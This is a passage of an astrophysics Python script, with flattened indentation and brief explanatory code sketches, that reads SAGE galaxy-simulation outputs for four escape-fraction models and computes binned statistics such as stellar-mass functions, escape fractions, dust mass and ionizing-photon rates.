N_times_var_pool = np.add(N_times_var_local, np.multiply(N_pool - 1, np.multiply(std_pool, std_pool)))
N_pool = np.add(N_local, N_pool)
if isinstance(mean_local, (list, np.ndarray)): # Check whether we are dealing with arrays rather than single values (numpy scalars fail this test, as intended).
for i in range(0, len(N_pool)):
if(N_pool[i] == 0): # This case is when we have no data points in the bin.
mean_pool[i] = 0.0
else:
mean_pool[i] = N_times_mean_pool[i]/N_pool[i]
if(N_pool[i] < 3): # In this instance we don't have enough data points to properly calculate the standard deviation.
std_pool[i] = 0.0
else:
std_pool[i] = np.sqrt(N_times_var_pool[i] / (N_pool[i] - 2)) # Denominator is N - 2 because the numerator sums two 'N - 1' terms.
else:
mean_pool = N_times_mean_pool / N_pool
if(N_pool < 3):
std_pool = 0.0
else:
std_pool = np.sqrt(N_times_var_pool / (N_pool - 2))
return mean_pool, std_pool
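# The pooled update can be checked against a direct computation. The sketch
# below (helper name is illustrative) applies the same N-weighted mean and
# Bessel-corrected pooled variance as the function above. The pooled mean
# always equals the mean of the concatenated samples; the pooled variance
# assumes the two groups share a common underlying mean, so it is not the
# variance of the concatenation.

```python
import numpy as np

def pool_stats(mean_pool, std_pool, N_pool, mean_local, std_local, N_local):
    """Merge two (mean, std, N) summaries without access to the raw data."""
    N_new = N_pool + N_local
    mean_new = (N_pool * mean_pool + N_local * mean_local) / N_new
    # Sum of the two (N - 1)-weighted variances, divided by N_new - 2.
    var_new = ((N_pool - 1) * std_pool ** 2 +
               (N_local - 1) * std_local ** 2) / (N_new - 2)
    return mean_new, np.sqrt(var_new), N_new

a = np.array([1.0, 2.0, 3.0])
b = np.array([4.0, 5.0, 6.0, 7.0])
pooled_mean, pooled_std, pooled_N = pool_stats(a.mean(), a.std(ddof=1), len(a),
                                               b.mean(), b.std(ddof=1), len(b))
```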
### Here ends the functions that deal with galaxy data manipulation. ###
#################################
if __name__ == '__main__':
np.seterr(divide='ignore')
number_models = 4
galaxies_model1="/fred/oz004/jseiler/kali/self_consistent_output/rsage_constant/galaxies/const_0.3_z5.782"
merged_galaxies_model1="/fred/oz004/jseiler/kali/self_consistent_output/rsage_constant/galaxies/const_0.3_MergedGalaxies"
photo_model1="/fred/oz004/jseiler/kali/self_consistent_output/rsage_constant/grids/cifog/const_0.3_photHI"
zreion_model1="/fred/oz004/jseiler/kali/self_consistent_output/rsage_constant/grids/cifog/const_0.3_reionization_redshift"
galaxies_model2="/fred/oz004/jseiler/kali/self_consistent_output/rsage_fej/galaxies/fej_alpha0.40_beta0.05_z5.782"
merged_galaxies_model2="/fred/oz004/jseiler/kali/self_consistent_output/rsage_fej/galaxies/fej_alpha0.40_beta0.05_MergedGalaxies"
photo_model2="/fred/oz004/jseiler/kali/self_consistent_output/rsage_fej/grids/cifog/fej_alpha0.40_beta0.05_photHI"
zreion_model2="/fred/oz004/jseiler/kali/self_consistent_output/rsage_fej/grids/cifog/fej_alpha0.40_beta0.05_reionization_redshift"
galaxies_model3="/fred/oz004/jseiler/kali/self_consistent_output/rsage_MHneg/galaxies/MHneg_1e8_1e12_0.99_0.05_z5.782"
merged_galaxies_model3="/fred/oz004/jseiler/kali/self_consistent_output/rsage_MHneg/galaxies/MHneg_1e8_1e12_0.99_0.05_MergedGalaxies"
photo_model3="/fred/oz004/jseiler/kali/self_consistent_output/rsage_MHneg/grids/cifog/MHneg_1e8_1e12_0.99_0.05_photHI"
zreion_model3="/fred/oz004/jseiler/kali/self_consistent_output/rsage_MHneg/grids/cifog/MHneg_1e8_1e12_0.99_0.05_reionization_redshift"
galaxies_model4="/fred/oz004/jseiler/kali/self_consistent_output/rsage_MHpos/galaxies/MHpos_1e8_1e12_0.01_0.50_z5.782"
merged_galaxies_model4="/fred/oz004/jseiler/kali/self_consistent_output/rsage_MHpos/galaxies/MHpos_1e8_1e12_0.01_0.50_MergedGalaxies"
photo_model4="/fred/oz004/jseiler/kali/self_consistent_output/rsage_MHpos/grids/cifog/MHpos_1e8_1e12_0.01_0.50_photHI"
zreion_model4="/fred/oz004/jseiler/kali/self_consistent_output/rsage_MHpos/grids/cifog/MHpos_1e8_1e12_0.01_0.50_reionization_redshift"
galaxies_filepath_array = [galaxies_model1,
galaxies_model2,
galaxies_model3,
galaxies_model4]
photo_array = [photo_model1,
photo_model2,
photo_model3,
photo_model4]
zreion_array = [zreion_model1,
zreion_model2,
zreion_model3,
zreion_model4]
GridSize_array = [256,
256,
256,
256]
precision_array = [2,
2,
2,
2]
merged_galaxies_filepath_array = [merged_galaxies_model1,
merged_galaxies_model2,
merged_galaxies_model3,
merged_galaxies_model4]
number_substeps = [10, 10, 10, 10] # How many substeps does each model have (specified by STEPS variable within SAGE).
number_snapshots = [99, 99, 99, 99] # Number of snapshots in the simulation (we don't have to do calculations for ALL snapshots).
# Tiamat extended has 164 snapshots.
FirstFile = [0, 0, 0, 0] # The first file number THAT WE ARE PLOTTING.
#LastFile = [63, 63, 63, 63] # The last file number THAT WE ARE PLOTTING.
LastFile = [0, 0, 0, 0] # The last file number THAT WE ARE PLOTTING.
NumFile = [64, 64, 64, 64] # The number of files for this simulation (plotting a subset of these files is allowed).
same_files = [0, 0, 0, 0] # In the case that model 1 and model 2 (index 0 and 1) have the same files, we don't want to read them in a second time.
# This array will tell us if we should keep the files for the next model or otherwise throw them away.
# The files will be kept until same_files[current_model_number] = 0.
# For example if we had 5 models we were plotting and model 1, 2, 3 shared the same files and models 4, 5 shared different files,
# Then same_files = [1, 1, 0, 1, 0] would be the correct values.
done_model = np.zeros((number_models)) # We use this to keep track of if we have done a model already.
model_tags = [r"$\mathbf{f_\mathrm{esc} \: Constant}$",
r"$\mathbf{f_\mathrm{esc} \: \propto \: f_\mathrm{ej}}$",
r"$\mathbf{f_\mathrm{esc} \: \propto \: M_\mathrm{H}^{-1}}$",
r"$\mathbf{f_\mathrm{esc} \: \propto \: M_\mathrm{H}}$"]
## Constants used for each model. ##
# Need to add an entry for EACH model. #
halo_cut = [32, 32, 32, 32] # Only calculate properties for galaxies whose host halos have at least this many particles.
# For Tiamat, z = [6, 7, 8] are snapshots [78, 64, 51]
# For Kali, z = [6, 7, 8] are snapshots [93, 76, 64]
#SnapList = [np.arange(0,99), np.arange(0,99)] # These are the snapshots over which the properties are calculated. NOTE: If the escape fraction is selected (fesc_prescription == 3) then this should be ALL the snapshots in the simulation as this prescriptions is temporally important.
#SnapList = [np.arange(20,99), np.arange(20, 99), np.arange(20, 99)]
SnapList = [[33, 50, 76, 93],
[33, 50, 76, 93],
[33, 50, 76, 93],
[33, 50, 76, 93]]
#SnapList = [[64],
# [64],
# [64],
# [64]]
#SnapList = [[33, 50, 64, 76, 93]]
#SnapList = [[64], [64]]
#SnapList = [np.arange(20,99)]
#PlotSnapList = [[30, 50, 64, 76, 93]]
#PlotSnapList = [[93, 76, 64], [93, 76, 64]]
#SnapList = [[93, 76, 64], [93, 76, 64]]
PlotSnapList = SnapList
simulation_norm = [5, 5, 5, 5] # Changes the constants (cosmology, snapshot -> redshift mapping etc) for each simulation.
# 0 for MySim (Manodeep's old one).
# 1 for Mini-Millennium.
# 2 for Tiamat (up to z =5).
# 3 for extended Tiamat (down to z = 1.6ish).
# 4 for Britton's Sim Pip
# 5 for Manodeep's new simulation Kali.
stellar_mass_halolen_lower = [32, 95, 95, 95] # These limits are for the number of particles in a halo.
stellar_mass_halolen_upper = [50, 105, 105, 105] # We calculate the average stellar mass for galaxies whose host halos have particle count between these limits.
calculate_observed_LF = [0, 0, 0, 0] # Determines whether we want to account for dust extinction when calculating the luminosity function of each model.
paper_plots = 1
##############################################################################################################
## Do a few checks to ensure all the arrays were specified properly. ##
for model_number in range(0,number_models):
assert(LastFile[model_number] - FirstFile[model_number] + 1 >= size)
if(simulation_norm[model_number] == 1):
AllVars.Set_Params_MiniMill()
elif(simulation_norm[model_number] == 3):
AllVars.Set_Params_Tiamat_extended()
elif(simulation_norm[model_number] == 4):
AllVars.Set_Params_Britton()
elif(simulation_norm[model_number] == 5):
AllVars.Set_Params_Kali()
else:
print("Simulation norm was set to {0}.".format(simulation_norm[model_number]))
raise ValueError("This option has been implemented yet. Get your head in the game Jacob!")
if (number_snapshots[model_number] != len(AllVars.SnapZ)): # Here we do a check to ensure that the simulation we've defined correctly matches the number of snapshots we have also defined.
print("The number_snapshots array is {0}".format(number_snapshots))
print("The simulation_norm array is {0}".format(simulation_norm))
print("The number of snapshots for model_number {0} has {1} but you've said there is only {2}".format(model_number, len(AllVars.SnapZ), number_snapshots[model_number]))
raise ValueError("Check either that the number of snapshots has been defined properly and that the normalization option is correct.")
######################################################################
##################### SETTING UP ARRAYS ##############################
######################################################################
### The arrays are set up in a 3 part process. ###
### This is because our arrays are 3D nested to account for the model number and snapshots. ###
# First set up the outer most array. #
## Arrays for functions of stellar mass. ##
SMF = [] # Stellar Mass Function.
mean_fesc_galaxy_array = [] # Mean escape fraction as a function of stellar mass.
std_fesc_galaxy_array = [] # Same as above but standard devation.
N_galaxy_array = [] # Number of galaxies as a function of stellar mass.
mean_BHmass_galaxy_array = [] # Black hole mass as a function of stellar mass.
std_BHmass_galaxy_array = [] # Same as above but standard deviation.
mergers_galaxy_array = [] # Number of mergers as a function of halo mass.
mean_dust_galaxy_array = [] # Mean dust mass as a function of stellar mass.
std_dust_galaxy_array = [] # Same as above but standard deviation.
mean_sfr_galaxy_array = [] # Mean star formation rate as a
# function of stellar mass
std_sfr_galaxy_array = [] # Same as above but standard deviation.
mean_ssfr_galaxy_array = [] # Mean specific star formation rate as a
# function of stellar mass
std_ssfr_galaxy_array = [] # Same as above but standard deviation.
mean_Ngamma_galaxy_array = [] # Mean number of ionizing photons emitted as
# a function of stellar mass.
std_Ngamma_galaxy_array = [] # Same as above but standard deviation.
mean_photo_galaxy_array = [] # Mean photoionization rate.
std_photo_galaxy_array = [] # Std photoionization rate.
mean_reionmod_galaxy_array = [] # Mean reionization modifier using RSAGE.
std_reionmod_galaxy_array = [] # Std.
mean_gnedin_reionmod_galaxy_array = [] # Mean reionization modifier using Gnedin analytic prescription.
std_gnedin_reionmod_galaxy_array = [] # Std.
## Arrays for functions of halo mass. ##
mean_ejected_halo_array = [] # Mean ejected fractions as a function of halo mass.
std_ejected_halo_array = [] # Same as above but standard deviation.
mean_fesc_halo_array = [] # Mean escape fraction as a function of halo mass.
std_fesc_halo_array = [] # Same as above but standard deviation.
mean_Ngamma_halo_array = [] # Mean number of ionizing photons THAT ESCAPE as a function of halo mass.
std_Ngamma_halo_array = [] # Same as above but standard deviation.
N_halo_array = [] # Number of galaxies as a function of halo mass.
mergers_halo_array = [] # Number of mergers as a function of halo mass.
mean_quasar_activity_array = [] # Mean fraction of galaxies that have quasar activity as a function of halo mass.
std_quasar_activity_array = [] # Same as above but standard deviation.
mean_reionmod_halo_array = [] # Mean reionization modifier as a function of halo mass.
std_reionmod_halo_array = [] # Same as above but for standard deviation.
mean_dust_halo_array = [] # Mean dust mass as a function of halo mass.
std_dust_halo_array = [] # Same as above but standard deviation.
## Arrays for functions of redshift. ##
sum_Ngamma_z_array = [] # Total number of ionizing photons THAT ESCAPE as a function of redshift.
mean_fesc_z_array = [] # Mean number of ionizing photons THAT ESCAPE as a function of redshift.
std_fesc_z_array = [] # Same as above but standard deviation.
N_z = [] # Number of galaxies as a function of redshift.
galaxy_halo_mass_mean = [] # Mean galaxy mass as a function of redshift.
N_quasars_z = [] # This tracks how many quasars went off during a specified snapshot.
N_quasars_boost_z = [] # This tracks how many galaxies are having their escape fraction boosted by quasar activity.
dynamicaltime_quasars_mean_z = [] # Mean dynamical time of galaxies that have a quasar event as a function of redshift.
dynamicaltime_quasars_std_z = [] # Same as above but standard deviation.
dynamicaltime_all_mean_z = [] # Mean dynamical time of all galaxies.
dynamicaltime_all_std_z = [] # Same as above but standard deviation.
mean_reionmod_z = [] # Mean reionization modifier as a function of redshift.
std_reionmod_z = [] # Same as above but for standard deviation.
N_reionmod_z = [] # Number of galaxies with a non-negative reionization modifier.
mean_ejected_z = [] # Mean ejected fraction as a function of redshift.
std_ejected_z = [] # Same as above but for standard deviation.
## Arrays that aren't functions of other variables. ##
Ngamma_global = []
mass_global = []
fesc_global = []
## Arrays as a function of fej ##
mean_Ngamma_fej = []
std_Ngamma_fej = []
N_fej = []
## Now the outer arrays have been defined, set up the next nest level for the number of models. ##
for model_number in range(0,number_models):
## Galaxy Arrays ##
SMF.append([])
mean_fesc_galaxy_array.append([])
std_fesc_galaxy_array.append([])
N_galaxy_array.append([])
mean_BHmass_galaxy_array.append([])
std_BHmass_galaxy_array.append([])
mergers_galaxy_array.append([])
mean_dust_galaxy_array.append([])
std_dust_galaxy_array.append([])
mean_sfr_galaxy_array.append([])
std_sfr_galaxy_array.append([])
mean_ssfr_galaxy_array.append([])
std_ssfr_galaxy_array.append([])
mean_Ngamma_galaxy_array.append([])
std_Ngamma_galaxy_array.append([])
mean_photo_galaxy_array.append([])
std_photo_galaxy_array.append([])
mean_reionmod_galaxy_array.append([])
std_reionmod_galaxy_array.append([])
mean_gnedin_reionmod_galaxy_array.append([])
std_gnedin_reionmod_galaxy_array.append([])
## Halo arrays. ##
mean_ejected_halo_array.append([])
std_ejected_halo_array.append([])
mean_fesc_halo_array.append([])
std_fesc_halo_array.append([])
mean_Ngamma_halo_array.append([])
std_Ngamma_halo_array.append([])
N_halo_array.append([])
mergers_halo_array.append([])
mean_quasar_activity_array.append([])
std_quasar_activity_array.append([])
mean_reionmod_halo_array.append([])
std_reionmod_halo_array.append([])
mean_dust_halo_array.append([])
std_dust_halo_array.append([])
## Redshift arrays. ##
sum_Ngamma_z_array.append([])
mean_fesc_z_array.append([])
std_fesc_z_array.append([])
N_z.append([])
galaxy_halo_mass_mean.append([])
N_quasars_z.append([])
N_quasars_boost_z.append([])
dynamicaltime_quasars_mean_z.append([])
dynamicaltime_quasars_std_z.append([])
dynamicaltime_all_mean_z.append([])
dynamicaltime_all_std_z.append([])
mean_reionmod_z.append([])
std_reionmod_z.append([])
N_reionmod_z.append([])
mean_ejected_z.append([])
std_ejected_z.append([])
## Arrays that aren't functions ##
Ngamma_global.append([])
mass_global.append([])
fesc_global.append([])
## Arrays as a function of fej ##
mean_Ngamma_fej.append([])
std_Ngamma_fej.append([])
N_fej.append([])
## And then finally set up the inner most arrays ##
## NOTE: We do the counts as float so we can keep consistency when we're calling MPI operations (just use MPI.FLOAT rather than deciding if we need to use MPI.INT)
for snapshot_idx in range(len(SnapList[model_number])):
## For the arrays that are functions of stellar/halo mass, the inner most level will be an array with the statistic binned across mass ##
## E.g. SMF[model_number][snapshot_idx] will return an array whereas N_z[model_number][snapshot_idx] will return a float. ##
## Functions of stellar mass arrays. ##
SMF[model_number].append(np.zeros((NB_gal), dtype = np.float32))
mean_fesc_galaxy_array[model_number].append(np.zeros((NB_gal), dtype = np.float32))
std_fesc_galaxy_array[model_number].append(np.zeros((NB_gal), dtype = np.float32))
N_galaxy_array[model_number].append(np.zeros((NB_gal), dtype = np.float32))
mean_BHmass_galaxy_array[model_number].append(np.zeros((NB_gal), dtype = np.float32))
std_BHmass_galaxy_array[model_number].append(np.zeros((NB_gal), dtype = np.float32))
mergers_galaxy_array[model_number].append(np.zeros((NB_gal), dtype = np.float32))
mean_dust_galaxy_array[model_number].append(np.zeros((NB_gal), dtype = np.float32))
std_dust_galaxy_array[model_number].append(np.zeros((NB_gal), dtype = np.float32))
mean_sfr_galaxy_array[model_number].append(np.zeros((NB_gal), dtype = np.float32))
std_sfr_galaxy_array[model_number].append(np.zeros((NB_gal), dtype = np.float32))
mean_ssfr_galaxy_array[model_number].append(np.zeros((NB_gal), dtype = np.float32))
std_ssfr_galaxy_array[model_number].append(np.zeros((NB_gal), dtype = np.float32))
mean_Ngamma_galaxy_array[model_number].append(np.zeros((NB_gal), dtype = np.float32))
std_Ngamma_galaxy_array[model_number].append(np.zeros((NB_gal), dtype = np.float32))
mean_photo_galaxy_array[model_number].append(np.zeros((NB_gal), dtype = np.float32))
std_photo_galaxy_array[model_number].append(np.zeros((NB_gal), dtype = np.float32))
mean_reionmod_galaxy_array[model_number].append(np.zeros((NB_gal), dtype = np.float32))
std_reionmod_galaxy_array[model_number].append(np.zeros((NB_gal), dtype = np.float32))
mean_gnedin_reionmod_galaxy_array[model_number].append(np.zeros((NB_gal), dtype = np.float32))
std_gnedin_reionmod_galaxy_array[model_number].append(np.zeros((NB_gal), dtype = np.float32))
## Function of halo mass arrays. ##
mean_ejected_halo_array[model_number].append(np.zeros((NB), dtype = np.float32))
std_ejected_halo_array[model_number].append(np.zeros((NB), dtype = np.float32))
mean_fesc_halo_array[model_number].append(np.zeros((NB), dtype = np.float32))
std_fesc_halo_array[model_number].append(np.zeros((NB), dtype = np.float32))
mean_Ngamma_halo_array[model_number].append(np.zeros((NB), dtype = np.float32))
std_Ngamma_halo_array[model_number].append(np.zeros((NB), dtype = np.float32))
N_halo_array[model_number].append(np.zeros((NB), dtype = np.float32))
mergers_halo_array[model_number].append(np.zeros((NB), dtype = np.float32))
mean_quasar_activity_array[model_number].append(np.zeros((NB), dtype = np.float32))
std_quasar_activity_array[model_number].append(np.zeros((NB), dtype = np.float32))
mean_reionmod_halo_array[model_number].append(np.zeros((NB), dtype = np.float32))
std_reionmod_halo_array[model_number].append(np.zeros((NB), dtype = np.float32))
mean_dust_halo_array[model_number].append(np.zeros((NB), dtype = np.float32))
std_dust_halo_array[model_number].append(np.zeros((NB), dtype = np.float32))
## Function of Redshift arrays. ##
sum_Ngamma_z_array[model_number].append(0.0)
mean_fesc_z_array[model_number].append(0.0)
std_fesc_z_array[model_number].append(0.0)
N_z[model_number].append(0.0)
galaxy_halo_mass_mean[model_number].append(0.0)
N_quasars_z[model_number].append(0.0)
N_quasars_boost_z[model_number].append(0.0)
dynamicaltime_quasars_mean_z[model_number].append(0.0)
dynamicaltime_quasars_std_z[model_number].append(0.0)
dynamicaltime_all_mean_z[model_number].append(0.0)
dynamicaltime_all_std_z[model_number].append(0.0)
mean_reionmod_z[model_number].append(0.0)
std_reionmod_z[model_number].append(0.0)
N_reionmod_z[model_number].append(0.0)
mean_ejected_z[model_number].append(0.0)
std_ejected_z[model_number].append(0.0)
Ngamma_global[model_number].append([])
mass_global[model_number].append([])
fesc_global[model_number].append([])
## Arrays as a function of fej. ##
mean_Ngamma_fej[model_number].append(np.zeros((NB_fej), dtype = np.float32))
std_Ngamma_fej[model_number].append(np.zeros((NB_fej), dtype = np.float32))
N_fej[model_number].append(np.zeros((NB_fej), dtype = np.float32))
######################################################################
#################### ALL ARRAYS SETUP ################################
######################################################################
## Now it's (finally) time to read in all the data and do the actual work. ##
for model_number in range(number_models):
if(simulation_norm[model_number] == 1):
AllVars.Set_Params_MiniMill()
elif(simulation_norm[model_number] == 3):
AllVars.Set_Params_Tiamat_extended()
elif(simulation_norm[model_number] == 4):
AllVars.Set_Params_Britton()
elif(simulation_norm[model_number] == 5):
AllVars.Set_Params_Kali()
else:
print("Simulation norm was set to {0}.".format(simulation_norm[model_number]))
raise ValueError("This option has not been implemented yet. Get your head in the game Jacob!")
if (done_model[model_number] == 1): # If we have already done this model (i.e., we kept the files and skipped this loop), move along.
assert(FirstFile[model_number] == FirstFile[model_number - 1])
assert(LastFile[model_number] == LastFile[model_number - 1])
continue
for fnr in range(FirstFile[model_number] + rank, LastFile[model_number]+1, size): # Divide up the input files across the processors.
GG, Gal_Desc = ReadScripts.ReadGals_SAGE(galaxies_filepath_array[model_number], fnr, number_snapshots[model_number], comm) # Read galaxies
G_Merged, _ = ReadScripts.ReadGals_SAGE(merged_galaxies_filepath_array[model_number], fnr, number_snapshots[model_number], comm) # Also need the merged galaxies.
G = ReadScripts.Join_Arrays(GG, G_Merged, Gal_Desc) # Then join them together for all galaxies.
keep_files = 1 # Flips to 0 when we are done with this file.
current_model_number = model_number # Used to differentiate between outer model_number and the inner model_number because we can keep files across model_numbers.
while(keep_files == 1):
## Just a few definitions to cut down the clutter a smidge. ##
current_halo_cut = halo_cut[current_model_number]
NumSubsteps = number_substeps[current_model_number]
do_observed_LF = calculate_observed_LF[current_model_number]
for snapshot_idx in range(0, len(SnapList[current_model_number])): # Now let's calculate stats for each required redshift.
current_snap = SnapList[current_model_number][snapshot_idx] # Get rid of some clutter.
w_gal = np.where((G.GridHistory[:, current_snap] != -1) & (G.GridStellarMass[:, current_snap] > 0.0) & (G.LenHistory[:, current_snap] > current_halo_cut) & (G.GridSFR[:, current_snap] >= 0.0) & (G.GridFoFMass[:, current_snap] >= 0.0))[0] # Only include galaxies that existed at the current snapshot, have positive stellar mass, and have non-negative SFR and FoF halo mass. Also ensure each galaxy resides in a sufficiently resolved halo.
w_merged_gal = np.where((G_Merged.GridHistory[:, current_snap] != -1) & (G_Merged.GridStellarMass[:, current_snap] > 0.0) & (G_Merged.LenHistory[:, current_snap] > current_halo_cut) & (G_Merged.GridSFR[:, current_snap] >= 0.0) & (G_Merged.GridFoFMass[:, current_snap] >= 0.0) & (G_Merged.LenMergerGal[:,current_snap] > current_halo_cut))[0]
print("There were {0} galaxies for snapshot {1} (Redshift {2:.3f}) model {3}.".format(len(w_gal), current_snap, AllVars.SnapZ[current_snap], current_model_number))
if (len(w_gal) == 0):
continue
mass_gal = np.log10(G.GridStellarMass[w_gal, current_snap] * 1.0e10 / AllVars.Hubble_h) # Msun. Log Units.
w_SFR = w_gal[np.where((G.GridSFR[w_gal, current_snap] > 0.0))[0]]
mass_SFR_gal = np.log10(G.GridStellarMass[w_SFR, current_snap] * \
1.0e10 / AllVars.Hubble_h)
SFR_gal = np.log10(G.GridSFR[w_SFR,current_snap])
sSFR_gal = SFR_gal - mass_SFR_gal
halo_part_count = G.LenHistory[w_gal, current_snap]
metallicity_gal = G.GridZ[w_gal, current_snap]
metallicity_tremonti_gal = np.log10(G.GridZ[w_gal, current_snap] / 0.02) + 9.0 # Using the Tremonti relationship for metallicity.
mass_central = np.log10(G.GridFoFMass[w_gal, current_snap] * 1.0e10 / AllVars.Hubble_h) # Msun. Log Units.
ejected_fraction = G.EjectedFraction[w_gal, current_snap]
w_dust = np.where(((G.GridDustColdGas[w_gal, current_snap]
+G.GridDustHotGas[w_gal, current_snap]
+G.GridDustEjectedMass[w_gal, current_snap]) > 0.0)
& (G.GridType[w_gal, current_snap] == 0))[0]
total_dust_gal = np.log10((G.GridDustColdGas[w_gal[w_dust], current_snap]
+G.GridDustHotGas[w_gal[w_dust], current_snap]
+G.GridDustEjectedMass[w_gal[w_dust], current_snap])
* 1.0e10 / AllVars.Hubble_h)
mass_gal_dust = np.log10(G.GridStellarMass[w_gal[w_dust], current_snap]
* 1.0e10 / AllVars.Hubble_h)
mass_centralgal_dust = np.log10(G.GridFoFMass[w_gal[w_dust], current_snap]
* 1.0e10 / AllVars.Hubble_h)
fesc = G.Gridfesc[w_gal, current_snap]
fesc[fesc < 0.0] = 0.0
Ngamma_gal = G.GridNgamma_HI[w_gal, current_snap] # 1.0e50
# photons/s.
if model_number < 3:
Ngamma_gal += 50.0 # Old versions of SAGE incorrectly
# subtracted 50.
Ngamma_gal *= fesc
reionmod = G.GridReionMod[w_gal, current_snap]
mass_reionmod_central = mass_central[reionmod > -1]
mass_reionmod_gal = mass_gal[reionmod > -1]
reionmod = reionmod[reionmod > -1] # Some satellite galaxies that don't have HotGas and hence won't be stripped. As a result reionmod = -1 for these. Ignore them.
mass_BH = G.GridBHMass[w_gal, current_snap] * 1.0e10 / AllVars.Hubble_h # Msun. Not log units.
L_UV = SFR_gal + 39.927 # Using relationship from STARBURST99, units of erg s^-1 A^-1. Log Units.
M_UV = AllVars.Luminosity_to_ABMag(L_UV, 1600)
if (do_observed_LF == 1): # Calculate the UV extinction if requested.
M_UV_obs = calculate_UV_extinction(AllVars.SnapZ[current_snap], L_UV, M_UV)
galaxy_halo_mass_mean_local, galaxy_halo_mass_std_local = Calculate_HaloPartStellarMass(halo_part_count, mass_gal, stellar_mass_halolen_lower[current_model_number], stellar_mass_halolen_upper[current_model_number]) # This is the average stellar mass for galaxies whose halos have the specified number of particles.
galaxy_halo_mass_mean[current_model_number][snapshot_idx] += pow(10, galaxy_halo_mass_mean_local) / (LastFile[current_model_number] + 1) # Adds to the average of the mean.
photofield_path = "{0}_{1:03d}".format(photo_array[current_model_number],
current_snap)
#photo_gal = photo.calc_gal_photoion(G.GridHistory[w_gal, current_snap],
# photofield_path,
# GridSize_array[current_model_number],
# precision_array[current_model_number])
#zreion_path = "{0}".format(zreion_array[current_model_number])
#zreion_gal = photo.calc_gal_zreion(G.GridHistory[w_gal, current_snap],
# zreion_path,
# GridSize_array[current_model_number],
# precision_array[current_model_number])
z_0 = 8.0
z_r = 7.0
gnedin_mfilt = ga.get_filter_mass(np.array(AllVars.SnapZ[current_snap]),
z_0, z_r)
gnedin_reionmod_gal = 1.0 / pow(1.0 + 0.26*pow(10, gnedin_mfilt - mass_central), 3.0)
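The modifier above follows the Gnedin (2000) filtering-mass suppression of baryons. A minimal standalone sketch of the same expression, with illustrative (not dataset) halo masses:

```python
import numpy as np

def gnedin_reion_modifier(log10_mvir, log10_mfilt):
    """Gnedin (2000) baryon-suppression factor,
    f = 1 / (1 + 0.26 * M_filt / M_vir)^3, masses in log10(Msun)."""
    return 1.0 / (1.0 + 0.26 * 10.0 ** (log10_mfilt - log10_mvir)) ** 3

# Haloes below, at, and well above a filtering mass of 10^9 Msun:
mods = gnedin_reion_modifier(np.array([8.0, 9.0, 11.0]), 9.0)
# Haloes far above the filtering mass are barely suppressed (mod -> 1).
```
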
###########################################
######## BASE PROPERTIES CALCULATED #######
###########################################
# Time to calculate relevant statistics.
### Functions of Galaxies/Stellar Mass ###
## Stellar Mass Function ##
(counts_local, bin_edges, bin_middle) = AllVars.Calculate_Histogram(mass_gal, bin_width, 0, m_gal_low, m_gal_high) # Bin the Stellar Mass
SMF[current_model_number][snapshot_idx] += counts_local
## Escape Fraction ##
(mean_fesc_galaxy_local, std_fesc_galaxy_local, N_local, sum_fesc_galaxy, bin_middle) = AllVars.Calculate_2D_Mean(mass_gal, fesc, bin_width, m_gal_low, m_gal_high)
(mean_fesc_galaxy_array[current_model_number][snapshot_idx], std_fesc_galaxy_array[current_model_number][snapshot_idx]) = update_cumulative_stats(mean_fesc_galaxy_array[current_model_number][snapshot_idx], std_fesc_galaxy_array[current_model_number][snapshot_idx], N_galaxy_array[current_model_number][snapshot_idx], mean_fesc_galaxy_local, std_fesc_galaxy_local, N_local)
## Black Hole Mass ##
(mean_BHmass_galaxy_local, std_BHmass_galaxy_local, N_local, sum_BHmass_galaxy, bin_middle) = AllVars.Calculate_2D_Mean(mass_gal, mass_BH, bin_width, m_gal_low, m_gal_high)
(mean_BHmass_galaxy_array[current_model_number][snapshot_idx], std_BHmass_galaxy_array[current_model_number][snapshot_idx]) = update_cumulative_stats(mean_BHmass_galaxy_array[current_model_number][snapshot_idx], std_BHmass_galaxy_array[current_model_number][snapshot_idx], N_galaxy_array[current_model_number][snapshot_idx], mean_BHmass_galaxy_local, std_BHmass_galaxy_local, N_local)
## Total Dust Mass ##
(mean_dust_galaxy_local, std_dust_galaxy_local, N_local,
sum_dust_galaxy, bin_middle) = AllVars.Calculate_2D_Mean(
mass_gal_dust, total_dust_gal,
bin_width, m_gal_low,
m_gal_high)
(mean_dust_galaxy_array[current_model_number][snapshot_idx],
std_dust_galaxy_array[current_model_number][snapshot_idx]) = \
update_cumulative_stats(mean_dust_galaxy_array[current_model_number][snapshot_idx],
std_dust_galaxy_array[current_model_number][snapshot_idx],
N_galaxy_array[current_model_number][snapshot_idx],
mean_dust_galaxy_local,
std_dust_galaxy_local,
N_local)
## Star Formation Rate ##
(mean_sfr_galaxy_local, std_sfr_galaxy_local, N_local,
sum_sfr_galaxy, bin_middle) = AllVars.Calculate_2D_Mean(
mass_SFR_gal, SFR_gal,
bin_width, m_gal_low,
m_gal_high)
(mean_sfr_galaxy_array[current_model_number][snapshot_idx],
std_sfr_galaxy_array[current_model_number][snapshot_idx]) = \
update_cumulative_stats(mean_sfr_galaxy_array[current_model_number][snapshot_idx],
std_sfr_galaxy_array[current_model_number][snapshot_idx],
N_galaxy_array[current_model_number][snapshot_idx],
mean_sfr_galaxy_local,
std_sfr_galaxy_local,
N_local)
## Specific Star Formation Rate ##
(mean_ssfr_galaxy_local, std_ssfr_galaxy_local, N_local,
sum_ssfr_galaxy, bin_middle) = AllVars.Calculate_2D_Mean(
mass_SFR_gal, sSFR_gal,
bin_width, m_gal_low,
m_gal_high)
(mean_ssfr_galaxy_array[current_model_number][snapshot_idx],
std_ssfr_galaxy_array[current_model_number][snapshot_idx]) = \
update_cumulative_stats(mean_ssfr_galaxy_array[current_model_number][snapshot_idx],
std_ssfr_galaxy_array[current_model_number][snapshot_idx],
N_galaxy_array[current_model_number][snapshot_idx],
mean_ssfr_galaxy_local,
std_ssfr_galaxy_local,
N_local)
## Number of Ionizing Photons ##
(mean_Ngamma_galaxy_local, std_Ngamma_galaxy_local, N_local,
sum_Ngamma_galaxy_local, bin_middle) = AllVars.Calculate_2D_Mean(
mass_gal, Ngamma_gal,
bin_width, m_gal_low,
m_gal_high)
(mean_Ngamma_galaxy_array[current_model_number][snapshot_idx],
std_Ngamma_galaxy_array[current_model_number][snapshot_idx]) = \
update_cumulative_stats(mean_Ngamma_galaxy_array[current_model_number][snapshot_idx],
std_Ngamma_galaxy_array[current_model_number][snapshot_idx],
N_galaxy_array[current_model_number][snapshot_idx],
mean_Ngamma_galaxy_local,
std_Ngamma_galaxy_local,
N_local)
## Photoionization rate ##
'''
(mean_photo_galaxy_local, std_photo_galaxy_local, N_local,
sum_photo_galaxy_local, bin_middle) = AllVars.Calculate_2D_Mean(
mass_gal, photo_gal,
bin_width, m_gal_low,
